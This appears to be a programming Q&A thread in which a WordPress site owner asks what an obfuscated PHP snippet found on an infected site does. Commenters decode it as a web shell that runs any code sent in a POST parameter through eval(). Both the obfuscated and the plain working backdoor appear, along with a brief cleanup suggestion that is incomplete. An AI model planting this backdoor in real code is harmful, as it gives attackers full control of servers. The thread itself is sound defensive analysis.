# What does this code?

Tags: php, wordpress, malware

I have a wordpress site and it was infected with malware I think. I have found this bit of php code in my files

```
$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q140b2c'])){eval(${$s20}['q140b2c']);}
```

What does it do?

Comment: It's equivalent to: `if (isset($_POST['q140b2c']) { eval($_POST['q140b2c']); }`. It gives an attacker with knowledge of which value to set, the ability to run anything he wants on the server.

Answer (score 0, accepted):

```
$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);
```

`$s20` evaluates to _POST

```
if(isset(${$s20}['q140b2c'])){
    eval(${$s20}['q140b2c']);
}
```

becomes

```
isset($_POST['q140b2c'])
```

eval then evaluates whatever is in that post

```
eval($_POST['q140b2c']);
```

Comment: OK, now how do I clean the site and what I have to do ?

Comment: That's not the question you asked and I honestly have no idea.

Answer (score 0):

I face same issue with one of my previous website hack.  Same code as above. They are going to put code this code in .php file before start of PHP tag.

So it will hold the execution of PHP site.

To solve download all code & search in file & remove. Then your site works ok.